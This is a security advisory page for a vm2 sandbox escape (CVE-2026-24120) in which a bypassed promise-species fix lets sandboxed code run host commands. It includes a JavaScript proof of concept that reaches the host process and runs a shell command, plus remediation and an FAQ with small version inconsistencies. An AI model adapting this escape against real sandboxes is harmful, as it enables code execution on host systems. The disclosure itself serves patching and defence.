CVE-2026-24120: vm2: Sandbox Breakout Through Promise Species
Summary
The fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
Details
The fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5 introduced the function resetPromiseSpecies https://github.com/patriksimek/vm2/blob/4b009c2d4b1131c01810c1205e641d614c322a29/lib/setup-sandbox.js#L35C7-L39. This function changes the species property of promise objects back to a known value. However, it uses the function [].includes and Object.defineProperty which can be overewritten to prevent the species from being changed.
PoC
The following code demonstrates this issue by aquiring the host process object and executing touch pwned.
js const {VM} = require("vm2"); const vm = new VM(); vm.run( Object.defineProperty=()=>{}; async function fn() { const e = new Error(); e.name = Symbol(); return e.stack; } p = fn(); p.constructor = { [Symbol.species]: class FakePromise { constructor(executor) { executor( (x) => x, (err) => { return err.constructor.constructor('return process')().mainModule.require('childprocess').execSync('touch pwned'); } ) } } }; p.then(); );
Impact
Attackers can perform Remote Code Execution under the assumption that the attacker can run arbitrary code execution inside the context of a vm2 sandbox.
Other sources
vm2 is an open source vm/sandbox for Node.js. Prior to version 3.10.5, the fix for CVE-2023-37466 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.10.5.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
npm/vm2to a version that resolves this vulnerability.Fixed in 3.10.5 - Upgrade
Upgrade
vm2to a version that resolves this vulnerability.Fixed in 3.10.5 - Upgrade
Upgrade to a fixed release to a version that resolves this vulnerability.
Patch GHSA-cchq-frgv-rjh5
Event History
Frequently Asked Questions
What is the severity of CVE-2026-24120?
CVE-2026-24120 is a critical vulnerability that allows attackers to escape the VM2 sandbox and execute arbitrary commands on the host.
How do I fix CVE-2026-24120?
To fix CVE-2026-24120, upgrade the VM2 package to version 3.10.5 or later.
Which versions of VM2 are affected by CVE-2026-24120?
CVE-2026-24120 affects VM2 versions up to and including 3.10.3.
What code execution risks are associated with CVE-2026-24120?
CVE-2026-24120 allows unauthenticated attackers to execute arbitrary code outside the VM2 sandbox, posing serious security risks.
Is the fix for CVE-2026-24120 sufficient to prevent future vulnerabilities?
While the fix addresses the current vulnerability, ongoing security assessments and updates are recommended to mitigate future risks.